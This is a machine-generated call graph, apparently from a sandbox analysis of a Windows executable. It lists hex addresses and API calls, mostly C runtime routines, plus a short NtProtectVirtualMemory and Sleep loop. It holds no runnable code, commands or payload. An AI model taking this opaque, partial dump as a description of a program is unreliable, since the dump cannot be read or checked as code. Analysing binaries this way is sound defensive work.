3563bdc9 5 API calls 6670 35637875 6666->6670 6667->6661 6667->6664 6667->6668 6668->6666 6670->6647 6676 3563777e 6671->6676 6677 35637776 6671->6677 6682 356377a9 6671->6682 6703 356356b9 RtlLeaveCriticalSection 6671->6703 6674 35634bc1 28 API calls 6674->6676 6676->6682 6704 35637665 6676->6704 6677->6674 6679 35635af6 38 API calls 6683 3563780c 6679->6683 6681 35637665 38 API calls 6681->6682 6707 3563782e 6682->6707 6683->6668 6684 35635af6 38 API calls 6683->6684 6684->6668 6686 3563499b 28 API calls 6685->6686 6687 35634bd2 6686->6687 6691 35637527 6688->6691 6690 356355ad 6690->6647 6690->6658 6692 35637533 6691->6692 6697 35635671 RtlEnterCriticalSection 6692->6697 6694 35637541 6698 35637575 6694->6698 6696 35637568 6696->6690 6697->6694 6701 356356b9 RtlLeaveCriticalSection 6698->6701 6700 3563757f 6700->6696 6701->6700 6702->6671 6703->6677 6705 35635af6 38 API calls 6704->6705 6706 3563766a 6705->6706 6706->6681 6708 35637834 6707->6708 6709 356377fd 6707->6709 6711 356356b9 RtlLeaveCriticalSection 6708->6711 6709->6668 6709->6679 6709->6683 6711->6709 6713 35637f1b 6712->6713 6714 35635af6 38 API calls 6713->6714 6715 35637f24 6714->6715 6716 35637f72 6715->6716 6724 35635671 RtlEnterCriticalSection 6715->6724 6716->6638 6718 35637f42 6725 35637f86 6718->6725 6723 356355a8 38 API calls 6723->6716 6724->6718 6726 35637f56 6725->6726 6727 35637f94 6725->6727 6729 35637f75 6726->6729 6727->6726 6732 35637cc2 6727->6732 6846 356356b9 RtlLeaveCriticalSection 6729->6846 6731 35637f69 6731->6716 6731->6723 6733 35637d42 6732->6733 6735 35637cd8 6732->6735 6736 3563571e 20 API calls 6733->6736 6759 35637d90 6733->6759 6735->6733 6737 35637d0b 6735->6737 6741 3563571e 20 API calls 6735->6741 6738 35637d64 6736->6738 6747 3563571e 20 API calls 6737->6747 6758 35637d2d 6737->6758 6739 3563571e 20 API calls 6738->6739 6742 35637d77 6739->6742 6740 3563571e 20 API calls 6744 35637d37 6740->6744 6746 35637d00 6741->6746 6748 3563571e 20 API calls 6742->6748 6743 35637d9e 6745 35637dfe 6743->6745 6757 3563571e 20 API calls 6743->6757 6749 3563571e 20 API calls 6744->6749 6750 3563571e 20 API calls 6745->6750 6760 356390ba 6746->6760 6752 35637d22 6747->6752 6753 35637d85 6748->6753 6749->6733 6754 35637e04 6750->6754 6788 356391b8 6752->6788 6756 3563571e 20 API calls 6753->6756 6754->6726 6756->6759 6757->6743 6758->6740 6800 35637e35 6759->6800 6761 356390cb 6760->6761 6787 356391b4 6760->6787 6762 356390dc 6761->6762 6763 3563571e 20 API calls 6761->6763 6764 356390ee 6762->6764 6765 3563571e 20 API calls 6762->6765 6763->6762 6766 35639100 6764->6766 6767 3563571e 20 API calls 6764->6767 6765->6764 6768 35639112 6766->6768 6770 3563571e 20 API calls 6766->6770 6767->6766 6769 35639124 6768->6769 6771 3563571e 20 API calls 6768->6771 6772 35639136 6769->6772 6773 3563571e 20 API calls 6769->6773 6770->6768 6771->6769 6774 35639148 6772->6774 6775 3563571e 20 API calls 6772->6775 6773->6772 6776 3563915a 6774->6776 6777 3563571e 20 API calls 6774->6777 6775->6774 6778 3563571e 20 API calls 6776->6778 6779 3563916c 6776->6779 6777->6776 6778->6779 6780 3563917e 6779->6780 6781 3563571e 20 API calls 6779->6781 6782 35639190 6780->6782 6783 3563571e 20 API calls 6780->6783 6781->6780 6784 356391a2 6782->6784 6785 3563571e 20 API calls 6782->6785 6783->6782 6786 3563571e 20 API calls 6784->6786 6784->6787 6785->6784 6786->6787 6787->6737 6789 356391c5 6788->6789 6790 3563921d 6788->6790 6791 356391d5 6789->6791 6792 3563571e 20 API calls 6789->6792 6790->6758 6793 356391e7 6791->6793 6794 3563571e 20 API calls 6791->6794 6792->6791 6795 356391f9 6793->6795 6797 3563571e 20 API calls 6793->6797 6794->6793 6796 3563920b 6795->6796 6798 3563571e 20 API calls 6795->6798 6796->6790 6799 3563571e 20 API calls 6796->6799 6797->6795 6798->6796 6799->6790 6801 35637e60 6800->6801 6802 35637e42 6800->6802 6801->6743 6802->6801 6806 3563925d 6802->6806 6805 3563571e 20 API calls 6805->6801 6807 35637e5a 6806->6807 6808 3563926e 6806->6808 6807->6805 6842 35639221 6808->6842 6811 35639221 20 API calls 6812 35639281 6811->6812 6813 35639221 20 API calls 6812->6813 6814 3563928c 6813->6814 6815 35639221 20 API calls 6814->6815 6816 35639297 6815->6816 6817 35639221 20 API calls 6816->6817 6818 356392a5 6817->6818 6819 3563571e 20 API calls 6818->6819 6820 356392b0 6819->6820 6821 3563571e 20 API calls 6820->6821 6822 356392bb 6821->6822 6823 3563571e 20 API calls 6822->6823 6824 356392c6 6823->6824 6825 35639221 20 API calls 6824->6825 6826 356392d4 6825->6826 6827 35639221 20 API calls 6826->6827 6828 356392e2 6827->6828 6829 35639221 20 API calls 6828->6829 6830 356392f3 6829->6830 6831 35639221 20 API calls 6830->6831 6832 35639301 6831->6832 6833 35639221 20 API calls 6832->6833 6834 3563930f 6833->6834 6835 3563571e 20 API calls 6834->6835 6836 3563931a 6835->6836 6837 3563571e 20 API calls 6836->6837 6838 35639325 6837->6838 6839 3563571e 20 API calls 6838->6839 6840 35639330 6839->6840 6841 3563571e 20 API calls 6840->6841 6841->6807 6843 35639258 6842->6843 6844 35639248 6842->6844 6843->6811 6844->6843 6845 3563571e 20 API calls 6844->6845 6845->6844 6846->6731 6848 35636d8a 6847->6848 6849 35635af6 38 API calls 6848->6849 6854 35636d94 6849->6854 6851 35636e18 6851->6642 6853 356355a8 38 API calls 6853->6854 6854->6851 6854->6853 6855 3563571e 20 API calls 6854->6855 6856 35635671 RtlEnterCriticalSection 6854->6856 6857 35636e0f 6854->6857 6855->6854 6856->6854 6860 356356b9 RtlLeaveCriticalSection 6857->6860 6859 35636e16 6859->6854 6860->6859 7794 35637a80 7795 35637a8d 7794->7795 7796 3563637b 20 API calls 7795->7796 7797 35637aa7 7796->7797 7798 3563571e 20 API calls 7797->7798 7799 35637ab3 7798->7799 7800 3563637b 20 API calls 7799->7800 7804 35637ad9 7799->7804 7801 35637acd 7800->7801 7803 3563571e 20 API calls 7801->7803 7802 35635eb7 11 API calls 7802->7804 7803->7804 7804->7802 7805 35637ae5 7804->7805 7383 35637bc7 7384 35637bd3 7383->7384 7385 35637c0a 7384->7385 7391 35635671 RtlEnterCriticalSection 7384->7391 7387 35637be7 7388 35637f86 20 API calls 7387->7388 7389 35637bf7 7388->7389 7392 35637c10 7389->7392 7391->7387 7395 356356b9 RtlLeaveCriticalSection 7392->7395 7394 35637c17 7394->7385 7395->7394 7396 3563a1c6 IsProcessorFeaturePresent 6861 3563a945 6863 3563a96d 6861->6863 6862 3563a9a5 6863->6862 6864 3563a997 6863->6864 6865 3563a99e 6863->6865 6870 3563aa17 6864->6870 6874 3563aa00 6865->6874 6871 3563aa20 6870->6871 6878 3563b19b 6871->6878 6875 3563aa20 6874->6875 6876 3563b19b 21 API calls 6875->6876 6877 3563a9a3 6876->6877 6879 3563b1da 6878->6879 6884 3563b25c 6879->6884 6888 3563b59e 6879->6888 6881 3563b286 6882 3563b8b2 20 API calls 6881->6882 6883 3563b292 6881->6883 6882->6883 6886 35632ada 5 API calls 6883->6886 6884->6881 6885 356378a3 5 API calls 6884->6885 6885->6881 6887 3563a99c 6886->6887 6889 3563b5c1 RaiseException 6888->6889 6890 3563b5bc 6889->6890 6890->6884 7806 3563508a 7807 356350a2 7806->7807 7808 3563509c 7806->7808 7809 35635000 20 API calls 7808->7809 7809->7807 7810 35638a89 7811 35636d60 51 API calls 7810->7811 7812 35638a8e 7811->7812 6891 35635348 6892 35633529 8 API calls 6891->6892 6893 3563534f 6892->6893 6894 35637b48 6904 35638ebf 6894->6904 6898 35637b55 6917 3563907c 6898->6917 6901 35637b7f 6902 3563571e 20 API calls 6901->6902 6903 35637b8a 6902->6903 6921 35638ec8 6904->6921 6906 35637b50 6907 35638fdc 6906->6907 6908 35638fe8 6907->6908 6941 35635671 RtlEnterCriticalSection 6908->6941 6910 3563905e 6955 35639073 6910->6955 6912 35639032 RtlDeleteCriticalSection 6915 3563571e 20 API calls 6912->6915 6913 3563906a 6913->6898 6916 35638ff3 6915->6916 6916->6910 6916->6912 6942 3563a09c 6916->6942 6918 35639092 6917->6918 6919 35637b64 RtlDeleteCriticalSection 6917->6919 6918->6919 6920 3563571e 20 API calls 6918->6920 6919->6898 6919->6901 6920->6919 6922 35638ed4 6921->6922 6931 35635671 RtlEnterCriticalSection 6922->6931 6924 35638f77 6936 35638f97 6924->6936 6928 35638ee3 6928->6924 6930 35638e78 66 API calls 6928->6930 6932 35637b94 RtlEnterCriticalSection 6928->6932 6933 35638f6d 6928->6933 6929 35638f83 6929->6906 6930->6928 6931->6928 6932->6928 6939 35637ba8 RtlLeaveCriticalSection 6933->6939 6935 35638f75 6935->6928 6940 356356b9 RtlLeaveCriticalSection 6936->6940 6938 35638f9e 6938->6929 6939->6935 6940->6938 6941->6916 6943 3563a0a8 6942->6943 6944 3563a0b9 6943->6944 6945 3563a0ce 6943->6945 6946 35636368 20 API calls 6944->6946 6954 3563a0c9 6945->6954 6958 35637b94 RtlEnterCriticalSection 6945->6958 6947 3563a0be 6946->6947 6949 356362ac 26 API calls 6947->6949 6949->6954 6950 3563a0ea 6959 3563a026 6950->6959 6952 3563a0f5 6975 3563a112 6952->6975 6954->6916 7223 356356b9 RtlLeaveCriticalSection 6955->7223 6957 3563907a 6957->6913 6958->6950 6960 3563a033 6959->6960 6962 3563a048 6959->6962 6961 35636368 20 API calls 6960->6961 6963 3563a038 6961->6963 6967 3563a043 6962->6967 6978 35638e12 6962->6978 6965 356362ac 26 API calls 6963->6965 6965->6967 6967->6952 6968 3563907c 20 API calls 6969 3563a064 6968->6969 6984 35637a5a 6969->6984 6971 3563a06a 6991 3563adce 6971->6991 6974 3563571e 20 API calls 6974->6967 7222 35637ba8 RtlLeaveCriticalSection 6975->7222 6977 3563a11a 6977->6954 6979 35638e2a 6978->6979 6980 35638e26 6978->6980 6979->6980 6981 35637a5a 26 API calls 6979->6981 6980->6968 6982 35638e4a 6981->6982 7006 35639a22 6982->7006 6985 35637a66 6984->6985 6986 35637a7b 6984->6986 6987 35636368 20 API calls 6985->6987 6986->6971 6988 35637a6b 6987->6988 6989 356362ac 26 API calls 6988->6989 6990 35637a76 6989->6990 6990->6971 6992 3563adf2 6991->6992 6993 3563addd 6991->6993 6995 3563ae2d 6992->6995 7000 3563ae19 6992->7000 6994 35636355 20 API calls 6993->6994 6997 3563ade2 6994->6997 6996 35636355 20 API calls 6995->6996 6998 3563ae32 6996->6998 6999 35636368 20 API calls 6997->6999 7001 35636368 20 API calls 6998->7001 7004 3563a070 6999->7004 7179 3563ada6 7000->7179 7003 3563ae3a 7001->7003 7005 356362ac 26 API calls 7003->7005 7004->6967 7004->6974 7005->7004 7007 35639a2e 7006->7007 7008 35639a36 7007->7008 7009 35639a4e 7007->7009 7031 35636355 7008->7031 7011 35639aec 7009->7011 7014 35639a83 7009->7014 7012 35636355 20 API calls 7011->7012 7015 35639af1 7012->7015 7034 35638c7b RtlEnterCriticalSection 7014->7034 7018 35636368 20 API calls 7015->7018 7016 35636368 20 API calls 7025 35639a43 7016->7025 7020 35639af9 7018->7020 7019 35639a89 7021 35639aa5 7019->7021 7022 35639aba 7019->7022 7023 356362ac 26 API calls 7020->7023 7024 35636368 20 API calls 7021->7024 7035 35639b0d 7022->7035 7023->7025 7027 35639aaa 7024->7027 7025->6980 7029 35636355 20 API calls 7027->7029 7028 35639ab5 7086 35639ae4 7028->7086 7029->7028 7032 35635b7a 20 API calls 7031->7032 7033 3563635a 7032->7033 7033->7016 7034->7019 7036 35639b3b 7035->7036 7074 35639b34 7035->7074 7037 35639b3f 7036->7037 7038 35639b5e 7036->7038 7040 35636355 20 API calls 7037->7040 7041 35639baf 7038->7041 7042 35639b92 7038->7042 7039 35632ada 5 API calls 7043 35639d15 7039->7043 7044 35639b44 7040->7044 7046 35639bc5 7041->7046 7089 3563a00b 7041->7089 7045 35636355 20 API calls 7042->7045 7043->7028 7047 35636368 20 API calls 7044->7047 7049 35639b97 7045->7049 7092 356396b2 7046->7092 7051 35639b4b 7047->7051 7053 35636368 20 API calls 7049->7053 7054 356362ac 26 API calls 7051->7054 7057 35639b9f 7053->7057 7054->7074 7055 35639bd3 7058 35639bd7 7055->7058 7059 35639bf9 7055->7059 7056 35639c0c 7061 35639c20 7056->7061 7062 35639c66 WriteFile 7056->7062 7060 356362ac 26 API calls 7057->7060 7063 35639ccd 7058->7063 7099 35639645 7058->7099 7104 35639492 GetConsoleCP 7059->7104 7060->7074 7066 35639c56 7061->7066 7067 35639c28 7061->7067 7065 35639c89 GetLastError 7062->7065 7070 35639bef 7062->7070 7063->7074 7075 35636368 20 API calls 7063->7075 7065->7070 7130 35639728 7066->7130 7071 35639c46 7067->7071 7072 35639c2d 7067->7072 7070->7063 7070->7074 7078 35639ca9 7070->7078 7122 356398f5 7071->7122 7072->7063 7115 35639807 7072->7115 7074->7039 7077 35639cf2 7075->7077 7079 35636355 20 API calls 7077->7079 7080 35639cb0 7078->7080 7081 35639cc4 7078->7081 7079->7074 7083 35636368 20 API calls 7080->7083 7137 35636332 7081->7137 7084 35639cb5 7083->7084 7085 35636355 20 API calls 7084->7085 7085->7074 7178 35638c9e RtlLeaveCriticalSection 7086->7178 7088 35639aea 7088->7025 7142 35639f8d 7089->7142 7164 35638dbc 7092->7164 7094 356396c2 7095 356396c7 7094->7095 7096 35635af6 38 API calls 7094->7096 7095->7055 7095->7056 7097 356396ea 7096->7097 7097->7095 7098 35639708 GetConsoleMode 7097->7098 7098->7095 7100 3563966a 7099->7100 7101 3563969f 7099->7101 7100->7101 7102 3563a181 WriteConsoleW CreateFileW 7100->7102 7103 356396a1 GetLastError 7100->7103 7101->7070 7102->7100 7103->7101 7110 35639607 7104->7110 7113 356394f5 7104->7113 7105 35632ada 5 API calls 7106 35639641 7105->7106 7106->7070 7108 356379e6 40 API calls 7108->7113 7109 3563957b WideCharToMultiByte 7109->7110 7111 356395a1 WriteFile 7109->7111 7110->7105 7112 3563962a GetLastError 7111->7112 7111->7113 7112->7110 7113->7108 7113->7109 7113->7110 7114 356395d2 WriteFile 7113->7114 7173 35637c19 7113->7173 7114->7112 7114->7113 7119 35639816 7115->7119 7116 356398d8 7117 35632ada 5 API calls 7116->7117 7121 356398f1 7117->7121 7118 35639894 WriteFile 7118->7119 7120 356398da GetLastError 7118->7120 7119->7116 7119->7118 7120->7116 7121->7070 7129 35639904 7122->7129 7123 35639a0f 7124 35632ada 5 API calls 7123->7124 7125 35639a1e 7124->7125 7125->7070 7126 35639986 WideCharToMultiByte 7127 35639a07 GetLastError 7126->7127 7128 356399bb WriteFile 7126->7128 7127->7123 7128->7127 7128->7129 7129->7123 7129->7126 7129->7128 7134 35639737 7130->7134 7131 356397ea 7132 35632ada 5 API calls 7131->7132 7136 35639803 7132->7136 7133 356397a9 WriteFile 7133->7134 7135 356397ec GetLastError 7133->7135 7134->7131 7134->7133 7135->7131 7136->7070 7138 35636355 20 API calls 7137->7138 7139 3563633d 7138->7139 7140 35636368 20 API calls 7139->7140 7141 35636350 7140->7141 7141->7074 7151 35638d52 7142->7151 7144 35639f9f 7145 35639fa7 7144->7145 7146 35639fb8 SetFilePointerEx 7144->7146 7147 35636368 20 API calls 7145->7147 7148 35639fd0 GetLastError 7146->7148 7150 35639fac 7146->7150 7147->7150 7149 35636332 20 API calls 7148->7149 7149->7150 7150->7046 7152 35638d5f 7151->7152 7156 35638d74 7151->7156 7153 35636355 20 API calls 7152->7153 7155 35638d64 7153->7155 7154 35636355 20 API calls 7157 35638da4 7154->7157 7158 35636368 20 API calls 7155->7158 7156->7154 7159 35638d99 7156->7159 7160 35636368 20 API calls 7157->7160 7161 35638d6c 7158->7161 7159->7144 7162 35638dac 7160->7162 7161->7144 7163 356362ac 26 API calls 7162->7163 7163->7161 7165 35638dc9 7164->7165 7167 35638dd6 7164->7167 7166 35636368 20 API calls 7165->7166 7168 35638dce 7166->7168 7169 35638de2 7167->7169 7170 35636368 20 API calls 7167->7170 7168->7094 7169->7094 7171 35638e03 7170->7171 7172 356362ac 26 API calls 7171->7172 7172->7168 7174 35635af6 38 API calls 7173->7174 7175 35637c24 7174->7175 7176 35637a00 38 API calls 7175->7176 7177 35637c34 7176->7177 7177->7113 7178->7088 7182 3563ad24 7179->7182 7181 3563adca 7181->7004 7183 3563ad30 7182->7183 7193 35638c7b RtlEnterCriticalSection 7183->7193 7185 3563ad3e 7186 3563ad70 7185->7186 7187 3563ad65 7185->7187 7189 35636368 20 API calls 7186->7189 7194 3563ae4d 7187->7194 7190 3563ad6b 7189->7190 7209 3563ad9a 7190->7209 7192 3563ad8d 7192->7181 7193->7185 7195 35638d52 26 API calls 7194->7195 7198 3563ae5d 7195->7198 7196 3563ae63 7212 35638cc1 7196->7212 7198->7196 7199 35638d52 26 API calls 7198->7199 7208 3563ae95 7198->7208 7202 3563ae8c 7199->7202 7200 35638d52 26 API calls 7203 3563aea1 CloseHandle 7200->7203 7205 35638d52 26 API calls 7202->7205 7203->7196 7206 3563aead GetLastError 7203->7206 7204 3563aedd 7204->7190 7205->7208 7206->7196 7207 35636332 20 API calls 7207->7204 7208->7196 7208->7200 7221 35638c9e RtlLeaveCriticalSection 7209->7221 7211 3563ada4 7211->7192 7213 35638cd0 7212->7213 7214 35638d37 7212->7214 7213->7214 7220 35638cfa 7213->7220 7215 35636368 20 API calls 7214->7215 7216 35638d3c 7215->7216 7217 35636355 20 API calls 7216->7217 7218 35638d27 7217->7218 7218->7204 7218->7207 7219 35638d21 SetStdHandle 7219->7218 7220->7218 7220->7219 7221->7211 7222->6977 7223->6957 7224 3563284f 7227 35632882 7224->7227 7230 35633550 7227->7230 7229 3563285d 7231 3563358a 7230->7231 7232 3563355d 7230->7232 7231->7229 7232->7231 7233 356347e5 21 API calls 7232->7233 7234 3563357a 7233->7234 7234->7231 7236 3563544d 7234->7236 7237 35635468 7236->7237 7238 3563545a 7236->7238 7239 35636368 20 API calls 7237->7239 7238->7237 7243 3563547f 7238->7243 7240 35635470 7239->7240 7241 356362ac 26 API calls 7240->7241 7242 3563547a 7241->7242 7242->7231 7243->7242 7244 35636368 20 API calls 7243->7244 7244->7240 7245 3563724e GetProcessHeap 6044 449a127 6047 449a161 6044->6047 6045 449a18a NtProtectVirtualMemory 6045->6047 6046 449a181 Sleep 6046->6044 6047->6044 6047->6045 6047->6046 6048 3563220c 6049 35632215 6048->6049 6050 3563221a 6048->6050 6062 356322b1 6049->6062 6054 356320db 6050->6054 6053 35632228 6055 356320e7 6054->6055 6058 3563210b 6055->6058 6061 356320f6 6055->6061 6066 35631eec 6055->6066 6057 3563216d 6059 35631eec 50 API calls 6057->6059 6057->6061 6058->6057 6060 35631eec 50 API calls 6058->6060 6058->6061 6059->6061 6060->6057 6061->6053 6063 356322c7 6062->6063 6065 356322d0 6063->6065 6481 35632264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6063->6481 6065->6050 6067 35631ef7 6066->6067 6068 35631f2a 6066->6068 6070 35631f1c 6067->6070 6071 35631efc 6067->6071 6109 35632049 6068->6109 6091 35631f3f 6070->6091 6073 35631f12 6071->6073 6074 35631f01 6071->6074 6083 356323ec 6073->6083 6077 35631f06 6074->6077 6078 3563240b 6074->6078 6077->6058 6123 356353e5 6078->6123 6232 35633513 6083->6232 6086 356323f5 6086->6077 6089 35632408 6089->6077 6090 3563351e 7 API calls 6090->6086 6092 35631f4b 6091->6092 6250 3563247c 6092->6250 6094 35631f52 6095 35632041 6094->6095 6096 35631f7c 6094->6096 6101 35631f57 6094->6101 6277 35632639 IsProcessorFeaturePresent 6095->6277 6261 356323de 6096->6261 6099 35632048 6100 35631f8b 6100->6101 6264 356322fc RtlInitializeSListHead 6100->6264 6101->6077 6103 35631f99 6265 356346c5 6103->6265 6107 35631fb8 6107->6101 6273 35634669 6107->6273 6110 35632055 6109->6110 6111 356320d3 6110->6111 6112 3563207d 6110->6112 6122 3563205e 6110->6122 6113 35632639 4 API calls 6111->6113 6354 3563244c 6112->6354 6115 356320da 6113->6115 6116 35632082 6363 35632308 6116->6363 6118 35632087 6366 356320c4 6118->6366 6120 3563209f 6369 3563260b 6120->6369 6122->6077 6129 35635aca 6123->6129 6126 3563351e 6203 35633820 6126->6203 6128 35632415 6128->6077 6130 35632410 6129->6130 6131 35635ad4 6129->6131 6130->6126 6132 35635e08 11 API calls 6131->6132 6133 35635adb 6132->6133 6133->6130 6134 35635e5e 11 API calls 6133->6134 6135 35635aee 6134->6135 6137 356359b5 6135->6137 6138 356359d0 6137->6138 6139 356359c0 6137->6139 6138->6130 6143 356359d6 6139->6143 6142 3563571e 20 API calls 6142->6138 6144 356359ef 6143->6144 6145 356359e9 6143->6145 6147 3563571e 20 API calls 6144->6147 6146 3563571e 20 API calls 6145->6146 6146->6144 6148 356359fb 6147->6148 6149 3563571e 20 API calls 6148->6149 6150 35635a06 6149->6150 6151 3563571e 20 API calls 6150->6151 6152 35635a11 6151->6152 6153 3563571e 20 API calls 6152->6153 6154 35635a1c 6153->6154 6155 3563571e 20 API calls 6154->6155 6156 35635a27 6155->6156 6157 3563571e 20 API calls 6156->6157 6158 35635a32 6157->6158 6159 3563571e 20 API calls 6158->6159 6160 35635a3d 6159->6160 6161 3563571e 20 API calls 6160->6161 6162 35635a48 6161->6162 6163 3563571e 20 API calls 6162->6163 6164 35635a56 6163->6164 6169 3563589c 6164->6169 6175 356357a8 6169->6175 6171 356358c0 6172 356358ec 6171->6172 6187 35635809 6172->6187 6174 35635910 6174->6142 6176 356357b4 6175->6176 6183 35635671 RtlEnterCriticalSection 6176->6183 6179 356357be 6180 3563571e 20 API calls 6179->6180 6182 356357e8 6179->6182 6180->6182 6181 356357f5 6181->6171 6184 356357fd 6182->6184 6183->6179 6185 356356b9 RtlLeaveCriticalSection 6184->6185 6186 35635807 6185->6186 6186->6181 6188 35635815 6187->6188 6195 35635671 RtlEnterCriticalSection 6188->6195 6190 3563581f 6196 35635a7f 6190->6196 6192 35635832 6200 35635848 6192->6200 6194 35635840 6194->6174 6195->6190 6197 35635a8e 6196->6197 6199 35635ab5 6196->6199 6198 35637cc2 20 API calls 6197->6198 6197->6199 6198->6199 6199->6192 6201 356356b9 RtlLeaveCriticalSection 6200->6201 6202 35635852 6201->6202 6202->6194 6204 3563384b 6203->6204 6205 3563382d 6203->6205 6204->6128 6206 3563383b 6205->6206 6209 35633b67 6205->6209 6214 35633ba2 6206->6214 6219 35633a82 6209->6219 6211 35633b81 6212 35633b99 TlsGetValue 6211->6212 6213 35633b8d 6211->6213 6212->6213 6213->6206 6215 35633a82 5 API calls 6214->6215 6216 35633bbc 6215->6216 6217 35633bd7 TlsSetValue 6216->6217 6218 35633bcb 6216->6218 6217->6218 6218->6204 6220 35633aaa 6219->6220 6224 35633aa6 6219->6224 6220->6224 6225 356339be 6220->6225 6223 35633ac4 GetProcAddress 6223->6224 6224->6211 6230 356339cd 6225->6230 6226 35633a77 6226->6223 6226->6224 6227 356339ea LoadLibraryExW 6228 35633a05 GetLastError 6227->6228 6227->6230 6228->6230 6229 35633a60 FreeLibrary 6229->6230 6230->6226 6230->6227 6230->6229 6231 35633a38 LoadLibraryExW 6230->6231 6231->6230 6238 35633856 6232->6238 6234 356323f1 6234->6086 6235 356353da 6234->6235 6236 35635b7a 20 API calls 6235->6236 6237 356323fd 6236->6237 6237->6089 6237->6090 6239 35633862 GetLastError 6238->6239 6240 3563385f 6238->6240 6241 35633b67 6 API calls 6239->6241 6240->6234 6242 35633877 6241->6242 6243 356338dc SetLastError 6242->6243 6244 35633ba2 6 API calls 6242->6244 6249 35633896 6242->6249 6243->6234 6245 35633890 6244->6245 6246 356338b8 6245->6246 6247 35633ba2 6 API calls 6245->6247 6245->6249 6248 35633ba2 6 API calls 6246->6248 6246->6249 6247->6246 6248->6249 6249->6243 6251 35632485 6250->6251 6281 35632933 IsProcessorFeaturePresent 6251->6281 6255 35632496 6260 3563249a 6255->6260 6292 356353c8 6255->6292 6258 356324b1 6258->6094 6260->6094 6348 356324b5 6261->6348 6263 356323e5 6263->6100 6264->6103 6266 356346dc 6265->6266 6267 35632ada 5 API calls 6266->6267 6268 35631fad 6267->6268 6268->6101 6269 356323b3 6268->6269 6270 356323b8 6269->6270 6271 35632933 IsProcessorFeaturePresent 6270->6271 6272 356323c1 6270->6272 6271->6272 6272->6107 6275 35634698 6273->6275 6274 35632ada 5 API calls 6276 356346c1 6274->6276 6275->6274 6276->6101 6278 3563264e 6277->6278 6279 356326f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6278->6279 6280 35632744 6279->6280 6280->6099 6282 35632491 6281->6282 6283 356334ea 6282->6283 6284 356334ef 6283->6284 6303 35633936 6284->6303 6288 35633510 6288->6255 6289 35633505 6289->6288 6317 35633972 6289->6317 6291 356334fd 6291->6255 6340 35637457 6292->6340 6295 35633529 6296 35633532 6295->6296 6297 35633543 6295->6297 6298 3563391b 6 API calls 6296->6298 6297->6260 6299 35633537 6298->6299 6300 35633972 RtlDeleteCriticalSection 6299->6300 6301 3563353c 6300->6301 6344 35633c50 6301->6344 6304 3563393f 6303->6304 6306 35633968 6304->6306 6307 356334f9 6304->6307 6321 35633be0 6304->6321 6308 35633972 RtlDeleteCriticalSection 6306->6308 6307->6291 6309 356338e8 6307->6309 6308->6307 6326 35633af1 6309->6326 6312 356338fd 6312->6289 6313 35633ba2 6 API calls 6314 3563390b 6313->6314 6315 35633918 6314->6315 6331 3563391b 6314->6331 6315->6289 6318 3563399c 6317->6318 6319 3563397d 6317->6319 6318->6291 6320 35633987 RtlDeleteCriticalSection 6319->6320 6320->6318 6320->6320 6322 35633a82 5 API calls 6321->6322 6323 35633bfa 6322->6323 6324 35633c18 InitializeCriticalSectionAndSpinCount 6323->6324 6325 35633c03 6323->6325 6324->6325 6325->6304 6327 35633a82 5 API calls 6326->6327 6328 35633b0b 6327->6328 6329 35633b24 TlsAlloc 6328->6329 6330 356338f2 6328->6330 6330->6312 6330->6313 6332 3563392b 6331->6332 6333 35633925 6331->6333 6332->6312 6335 35633b2c 6333->6335 6336 35633a82 5 API calls 6335->6336 6337 35633b46 6336->6337 6338 35633b5e TlsFree 6337->6338 6339 35633b52 6337->6339 6338->6339 6339->6332 6341 35637470 6340->6341 6342 35632ada 5 API calls 6341->6342 6343 356324a3 6342->6343 6343->6258 6343->6295 6345 35633c59 6344->6345 6347 35633c7f 6344->6347 6346 35633c69 FreeLibrary 6345->6346 6345->6347 6346->6345 6347->6297 6349 356324c4 6348->6349 6350 356324c8 6348->6350 6349->6263 6351 35632639 4 API calls 6350->6351 6353 356324d5 6350->6353 6352 35632559 6351->6352 6353->6263 6355 35632451 6354->6355 6356 35632455 6355->6356 6357 35632461 6355->6357 6375 3563527a 6356->6375 6360 3563246e 6357->6360 6378 3563499b 6357->6378 6360->6116 6453 356334c7 RtlInterlockedFlushSList 6363->6453 6365 35632312 6365->6118 6455 3563246f 6366->6455 6368 356320c9 6368->6120 6370 35632617 6369->6370 6374 3563262d 6370->6374 6474 356353ed 6370->6474 6373 35633529 8 API calls 6373->6374 6374->6122 6400 35635132 6375->6400 6379 356349a7 6378->6379 6380 356349bf 6379->6380 6422 35634af5 GetModuleHandleW 6379->6422 6431 35635671 RtlEnterCriticalSection 6380->6431 6384 35634a65 6432 35634aa5 6384->6432 6388 35634a3c 6391 35634a54 6388->6391 6395 35634669 5 API calls 6388->6395 6389 35634a82 6435 35634ab4 6389->6435 6390 35634aae 6443 3563bdc9 6390->6443 6396 35634669 5 API calls 6391->6396 6393 3563527a 20 API calls 6393->6388 6395->6391 6396->6384 6397 356349c7 6397->6384 6397->6388 6397->6393 6403 356350e1 6400->6403 6402 3563245f 6402->6116 6404 356350ed 6403->6404 6411 35635671 RtlEnterCriticalSection 6404->6411 6406 356350fb 6412 3563515a 6406->6412 6410 35635119 6410->6402 6411->6406 6413 35635182 6412->6413 6414 3563517a 6412->6414 6413->6414 6417 3563571e 20 API calls 6413->6417 6415 35632ada 5 API calls 6414->6415 6416 35635108 6415->6416 6418 35635126 6416->6418 6417->6414 6421 356356b9 RtlLeaveCriticalSection 6418->6421 6420 35635130 6420->6410 6421->6420 6423 356349b3 6422->6423 6423->6380 6424 35634b39 GetModuleHandleExW 6423->6424 6425 35634b63 GetProcAddress 6424->6425 6426 35634b78 6424->6426 6425->6426 6427 35634b95 6426->6427 6428 35634b8c FreeLibrary 6426->6428 6429 35632ada 5 API calls 6427->6429 6428->6427 6430 35634b9f 6429->6430 6430->6380 6431->6397 6446 356356b9 RtlLeaveCriticalSection 6432->6446 6434 35634a7e 6434->6389 6434->6390 6447 35636025 6435->6447 6438 35634ae2 6441 35634b39 8 API calls 6438->6441 6439 35634ac2 GetPEB 6439->6438 6440 35634ad2 GetCurrentProcess TerminateProcess 6439->6440 6440->6438 6442 35634aea ExitProcess 6441->6442 6444 35632ada 5 API calls 6443->6444 6445 3563bdd4 6444->6445 6445->6445 6446->6434 6448 3563604a 6447->6448 6452 35636040 6447->6452 6449 35635c45 5 API calls 6448->6449 6449->6452 6450 35632ada 5 API calls 6451 35634abe 6450->6451 6451->6438 6451->6439 6452->6450 6454 356334d7 6453->6454 6454->6365 6460 356353ff 6455->6460 6458 3563391b 6 API calls 6459 3563354d 6458->6459 6459->6368 6463 35635c2b 6460->6463 6464 35632476 6463->6464 6465 35635c35 6463->6465 6464->6458 6467 35635db2 